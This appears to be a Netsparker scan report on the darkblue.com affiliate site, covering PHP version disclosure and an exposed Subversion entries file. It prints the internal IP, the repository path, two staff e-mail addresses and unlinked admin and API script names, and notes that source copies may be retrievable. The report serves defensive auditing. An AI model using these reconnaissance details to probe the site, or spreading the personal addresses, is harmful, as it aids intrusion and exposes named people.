Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" 
rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" 
class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for published vulnerabilities in the identified version and combine that knowledge with other weaknesses in the application or the web server. One caveat when triaging: Apache/2.2.3 and PHP/5.1.6 are the versions packaged with CentOS 5, whose packages receive backported security fixes without a version bump, so the banner identifies the platform but does not by itself show which fixes are missing.
/

http://darkblue.com/

Extracted Version

PHP/5.1.6

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" 
rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" 
class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
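The check below, as an added example that is not part of the Netsparker report, parses a raw HTTP response and lists every product/version pair found in the usual banner headers and in an Apache ServerSignature footer. The sample response is constructed from the headers shown above with a shortened body; the footer line is the one that appears in the directory-listing response later in this report. It uses only the Python standard library.

```python
"""Version-disclosure check over a raw HTTP response (added example, not Netsparker code)."""
import re

# Constructed from the headers in this finding; the body is shortened and the
# <address> footer is the ServerSignature line from the directory-listing response.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 04 Jan 2011 17:12:12 GMT\r\n"
    "Server: Apache/2.2.3 (CentOS)\r\n"
    "X-Powered-By: PHP/5.1.6\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>...<address>Apache/2.2.3 (CentOS) Server at darkblue.com Port 80"
    "</address></body></html>"
)

# Headers that routinely carry software versions (names compared lower-cased).
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")
# "Product/1.2.3" tokens; a Server header may carry several (mod_ssl/..., OpenSSL/...).
PRODUCT_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)+)")


def parse_response(raw):
    """Split a raw response into (status_line, headers, body).

    Header names are lower-cased; a repeated header is joined with ', '."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return lines[0], headers, body


def version_disclosures(raw):
    """Return [(where, product, version)] for every product/version token in the
    banner headers and in an Apache ServerSignature <address> footer."""
    _, headers, body = parse_response(raw)
    found = []
    for name in BANNER_HEADERS:
        if name in headers:
            found.extend((name, p, v) for p, v in PRODUCT_RE.findall(headers[name]))
    footer = re.search(r"<address>(.*?)</address>", body, re.I | re.S)
    if footer:
        found.extend(("body:address", p, v) for p, v in PRODUCT_RE.findall(footer.group(1)))
    return found


if __name__ == "__main__":
    for where, product, version in version_disclosures(SAMPLE_RESPONSE):
        print("%-14s %s %s" % (where, product, version))
```

The server-side fix is expose_php = Off in php.ini, which removes the X-Powered-By header, together with ServerTokens Prod and ServerSignature Off in httpd.conf, which reduce the Server header to "Apache" and drop the footer. Hiding the banners only removes the hint; it is not a substitute for patching.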
[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in a page. It was not determined whether the address belongs to the system itself or to a host on an internal network. In this case the page is /.svn/entries, the metadata file of a Subversion working copy that was checked out directly into the web root, and the address is that of the Subversion server the site was deployed from.

Impact

This kind of information is useful to an attacker when combined with other vulnerabilities: it maps part of the internal network (here the host the site is deployed from) and supplies a concrete internal target once another weakness gives access behind the perimeter.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address is the real internal address of the target web server or of an internal network. Here the address appears as the repository URL inside /.svn/entries, so the underlying problem is the exposed .svn directory rather than the address itself. The file also discloses the repository layout (dbs/darkblue/branches/live/www), the repository UUID, the committing users' e-mail addresses (a.clark@au.darkbluesea.com, b.dutton@au.darkbluesea.com) and the name of every versioned file and subdirectory, including scripts that are not linked from the public site, such as adminTools.htm, banAdmin.htm, controller_old.php and api.php. Deploy with svn export rather than a checkout, or deny web access to any .svn directory in the Apache configuration, and verify whether /.svn/text-base/ is also served, because a working copy of this format keeps an unmodified copy of every versioned file there.
/.svn/entries

http://darkblue.com/.svn/entries

Extracted IP Address(es)

172.17.1.192

Request

GET /.svn/entries HTTP/1.1
Referer: http://darkblue.com/.svn/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 08 Nov 2010 00:35:53 GMT
ETag: "6880cb-4f8d-ce7e8c40"
Accept-Ranges: bytes
Content-Length: 20365
Content-Type: text/plain; charset=UTF-8


8dir39656http://172.17.1.192/dbs/darkblue/branches/live/wwwhttp://172.17.1.192/dbs2010-08-30T04:15:20.608602Z39652b.dutton@au.darkbluesea.comsvn:special svn:externals svn:needs-lockaa7cf516-5f06-0410-ac50-8bdd415cf406 penguins.htmfile2010-01-12T00:34:16.000000Z4a918f0d499a9e5c56ade8d94eec2e882009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props error.htmfile2010-01-12T00:34:16.000000Z3f3dbc008b67965b303547948bed69122009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com xbTreeWidgetStatic.jsfile2010-01-12T00:34:16.000000Zae1f6b20282dd8f0becd11a6e16292fa2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props remittance.phpfile2010-01-12T00:34:16.000000Za3e582bf6574922665b7b1aaa9a2eb612009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props kirstydir webhosting_signup.htmfile2010-01-12T00:34:16.000000Z835ed0e82232701abb395e503765d02e2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com advSignup.phpfile2010-01-12T00:34:16.000000Z04601b43c27e8cc5499653991f469ebc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advindex.htmfile2010-01-12T00:34:16.000000Zba057a8a1281de096dacdb5ef55627b32009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props images.phpfile2010-01-12T00:34:16.000000Z978b89da2251c60af115490c822bb8592009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props scottdir infocenterdir cobrand_imagesdir termsandconditions.phpfile2010-01-12T00:34:16.000000Z4ee36f5f8f1169f66a2d641ee889bafb2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props affiliates.cssfile2010-01-12T00:34:16.000000Zfa993821d254e0a6696a145ff3802b642009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props MSN.giffile2010-01-12T00:34:16.000000Z9e36ad82bbcc8868321fa0ee2fa90fb82009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props catContentdir 
addSite.htmfile2010-01-12T00:34:16.000000Z6fbe601b6d7313c292c2fd0ad5318eb62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props docdir movesort.curfile2010-01-12T00:34:16.000000Zfbb3fb18126e3e19b85b404f103990082009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props prefs.htmfile2010-01-12T00:34:16.000000Z4c53938af2ce8120c469e328feb8a5542009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props stat.wmlfile2010-01-12T00:34:16.000000Z55824e7220a937789e804446bfaf9aca2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advfrontpage_subpage.phpfile2010-01-12T00:34:16.000000Z5e0c81b6a606a7bbf321308bb0547bbf2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props newsdir help.htmfile2010-01-12T00:34:16.000000Z01be14384259e710699c1cba1b9e2c682009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cobrand_cssdir health_signup.htmfile2010-01-12T00:34:16.000000Z43476e85cb695302c8e1667025c8dab82009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advtermsandconditions_adult.htmfile2010-01-12T00:34:16.000000Zb7c083b36a479f429f444bf5ba26f1dd2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props includedir mainaff.htmfile2010-01-12T00:34:16.000000Z3a2e1b7f05da0bbfbe9f8f8c301dfae62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props t.phpfile2010-01-12T00:34:16.000000Zf0c104c163dc0f218d86d28f56debc902009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com date_signup.htmfile2010-01-12T00:34:16.000000Z9072f4466c90a37e8c08434ba64ed6752009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props gethtml.phpfile2010-01-12T00:34:16.000000Ze6740dd617309a802f175c111af7c0902009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props xbDebug.jsfile2010-01-12T00:34:16.000000Z45c6ca57dfa3d7db2fab8aaf5e785a6c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props abestwebdir 
api.phpfile2010-01-12T00:34:16.000000Za63b92dd833167b42d9f3ae30518abe22009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props adminTools.htmfile2010-01-12T00:34:16.000000Z20080b6982d5b0595125ba1a7b5dbbe32009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props ariblk.ttffile2010-01-12T00:34:16.000000Z3e7043e8125f1c8998347310f2c315bc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props stat.htmfile400632010-11-08T00:35:52.000000Ze003caacaeff85a251158a290bd84dda2010-11-08T00:35:09.760964Z40063a.clark@au.darkbluesea.comhas-props ftc_____.ttffile2010-01-12T00:34:16.000000Zc558b045b67d79282ac3f46176a9cd692009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advfrontpage.phpfile2010-01-12T00:34:16.000000Za9a845904c6aa4d5cfb509d5da384a412009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props billingReturn.htmfile2010-01-12T00:34:16.000000Z55faf69264d6feaaa74b40ccf69c85f92009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props nutrition_signup.htmfile2010-01-12T00:34:16.000000Zacd536743db2947b333b4da94ef0c3992009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props affiliatesdir maintenance.htmfile2010-01-12T00:34:16.000000Z3cda14b1a713c8790a4e32060afd5ea12009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props AIM.giffile2010-01-12T00:34:16.000000Z15bf91fddf01770d5c7f4555e843df562009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props message.htmfile2010-01-12T00:34:16.000000Zb6c604145f97cf15e3ce77c8c0c1a2e82009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props invoiceapi.phpfile2010-01-12T00:34:16.000000Z1db3c5c7db0b358d4190f0308e1dc9b12009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props scripts.htmfile2010-01-12T00:34:16.000000Zf5bc031373d0e1120a4ce88a4a09b7df2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 
frontpage_subpage.phpfile2010-01-12T00:34:16.000000Z92b90a2b55b2ac7ad723d17148f39aff2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props heapPing.phpfile2010-01-12T00:34:16.000000Z5ece7cf64f79db5a423db201aee749032009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com Yahoo.giffile2010-01-12T00:34:16.000000Z744fd4a4ef6d28f978319f7c93b595212009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props graphit.phpfile2010-01-12T00:34:16.000000Zcab0825a6f014f16dd05ba4a70f655802009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props homepagedir technology_signup.htmfile2010-01-12T00:34:16.000000Z0f61d4f58cfccd6bd901624757dcc4eb2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com networkdir debt_signup.htmfile2010-01-12T00:34:16.000000Z92dc5de35e1dfa2921d5f17bff670b082009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props favicon.icofile2010-01-12T00:34:16.000000Ze7226e9a5a856638c43892ebbbc291dc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props x10camp.htmfile2010-01-12T00:34:16.000000Z4c6c634aaea6042b60358a24956b09952009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props hairloss_signup.htmfile2010-01-12T00:34:16.000000Z79a642c7784e53f9cdf641be8a60dd852009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props installmanagerdir weightloss_signup.htmfile2010-01-12T00:34:16.000000Z826724965b17276d268abacc302bf6792009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props check.htmfile2010-01-12T00:34:16.000000Z16692daf2eabda3c1f2007045ea683db2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props directorydir imagesdir sid.htmfile2010-01-12T00:34:16.000000Z3af220bd6407deea29f848462bd5396b2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com termsandconditionsdir consoleViewer.phpfile2010-01-12T00:34:16.000000Zeb56dfbd6d8c1166e2d2ceb76e732e442009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 
frontpage.phpfile2010-01-12T00:34:16.000000Ze68eb3fe41924585847f45bfe4f5403c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props details.htmfile2010-01-12T00:34:16.000000Z009f9cb6b759b1024b4f2ca58353809d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props feedSearch.phpfile2010-01-12T00:34:16.000000Zb26f0218e2a66420dd34b45724ef4a852009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.com pharmacy_signup.htmfile2010-01-12T00:34:16.000000Zea5a845e4f2866196b5913d9df1bedf42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props codeCreator.htmfile2010-01-12T00:34:16.000000Zab1ccd95f110bb70d1df59ed053f90bc2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props controller_new.phpfile2010-01-12T00:34:16.000000Zcb13b453bb10f3c3b7099a152b4acf2c2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props arial.ttffile2010-01-12T00:34:16.000000Z124a965ffc59a680c2c20c69c29840322009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props popupsdir helpdir gaTerms.htmfile2010-01-12T00:34:16.000000Z568d9f9dada5fc43d1c9350ecc88607a2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props contactus.htmfile2010-01-12T00:34:16.000000Zf2d0a1312f0d3d690ff589bdb91354662009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props showCreative.htmfile2010-01-12T00:34:16.000000Zf4531f709aaae913e64a3fce5b51fd712009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props movesortx.curfile2010-01-12T00:34:16.000000Zb3d6fcd221f22181a34a6212d7b915b42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props assetShow.htmfile2010-01-12T00:34:16.000000Zb434e50f7c09dbabe56575bfdd4b81232009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props casinoonnetcamp.htmfile2010-01-12T00:34:16.000000Z2568283ef414c17f8a91cd8a2f8a30d42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 
controller.phpfile2010-01-12T00:34:16.000000Z14bb4a0771eeca33806330259f7f4cdf2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props subPage.phpfile2010-01-12T00:34:16.000000Z9f5009d07974efecaca4de2787c7c5182009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props banners.htmfile2010-01-12T00:34:16.000000Z5ff549b5b72687aa762f9b710f48716b2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props ICQ.giffile2010-01-12T00:34:16.000000Zf5fe683506046cf3d1602d39b8b575922009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props darkblue.cssfile2010-01-12T00:34:16.000000Z1f2f967294832bca599825ab9d9f9c1d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props kb-style.cssfile2010-01-12T00:34:16.000000Zc5c3a9b213589fbfd73292f4ae9cb7602009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props interfacesdir privacypolicy.htmfile2010-01-12T00:34:16.000000Zff2e32eebdf7dec6b63fe56eed5132f12009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props confirm.htmfile2010-01-12T00:34:16.000000Z09243c4e2623be6eccca69b9979b46c62009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cacherdir unsorted.pngfile2010-01-12T00:34:16.000000Z469fcbbad3df574281363fe5b029db9f2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sectionsdir googlewhackdir newsletterdir termsandconditions.htmfile2010-01-12T00:34:16.000000Z4772176145fb3fa16b3a1329f793960b2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props graphdir assetsdir index_new.htmfile2010-01-12T00:34:16.000000Za37cf4f8f2dbbc185709264f1d825f762009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props unsorted.giffile2010-01-12T00:34:16.000000Z75262b2bc3b6cc03593f862c8ffb35842009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props gstat.htmfile2010-01-12T00:34:16.000000Zd650dc0ee1365eddbe9aa7c44dec11062009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 
sortdesc.pngfile2010-01-12T00:34:16.000000Zbf267c5d4b6963db4499f3645e7178b02009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props forgotpassword.htmfile2010-01-12T00:34:16.000000Zc3387b558117c9f02746574e019d32842009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props cPayout.phpfile2010-01-12T00:34:16.000000Z22053a8095744f707d6d2f05b017cfb02009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props balanceDetails.htmfile2010-01-12T00:34:16.000000Z5064164970de689dd6538cca053d48382009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props dating_signup.htmfile2010-01-12T00:34:16.000000Z13a7f59aee9f8f1e29900f1917bd34e72009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props subcontroller.phpfile2010-01-12T00:34:16.000000Zc40167834bb6a07259b26d0392e494982009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props caption.htmfile2010-01-12T00:34:16.000000Zb0c2b6c8b5004f3b249d4346772bb0602009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props statisticsad.htmfile2010-01-12T00:34:16.000000Z5c12bf7cea79900ccb07add08a9727cd2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props seochallengedir tourdir sortdesc.giffile2010-01-12T00:34:16.000000Z961d50bb5e5d6fcba3586f41a3af5fce2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props roarcamp.htmfile2010-01-12T00:34:16.000000Z7f31a6c427a21c45b41955da209e71b92009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props dentalplans.htmfile2010-01-12T00:34:16.000000Z096b180d6f133dbf414eee73e63357ac2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props index.htmfile2010-02-01T04:40:07.000000Z9c91340b41968371713387327eb71c232010-02-01T04:40:05.723051Z38669svnsyncerhas-props adtredirdir advertiser.cssfile2010-01-12T00:34:16.000000Z4ae5c481a0a364d71a146152bbc8116e2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advdirectorydir 
sortasc.pngfile2010-01-12T00:34:16.000000Za6ad4c3f7565bb89d6ab3de0178d5f1d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props healthreportdir sexualhealth_signup.htmfile2010-01-12T00:34:16.000000Z06d573421c6c40e14e74ac688f0a7bae2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props insurance_signup.htmfile2010-01-12T00:34:16.000000Zbe339be5fbfb59bd492492034bea79d42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 4ArmJoltScript.ttffile2010-01-12T00:34:16.000000Zc9d30a2f1810b730d12604c5020eb9122009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props getPaypal.htmfile2010-01-12T00:34:16.000000Zddfe595b881aa50615b6ee39bf7087ea2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props blank.htmfile2010-01-12T00:34:16.000000Z9fe2655fa355265b7dca39b68c29315d2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props sortasc.giffile2010-01-12T00:34:16.000000Z6e3b2418098d618e316a7df3b9e7410f2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props 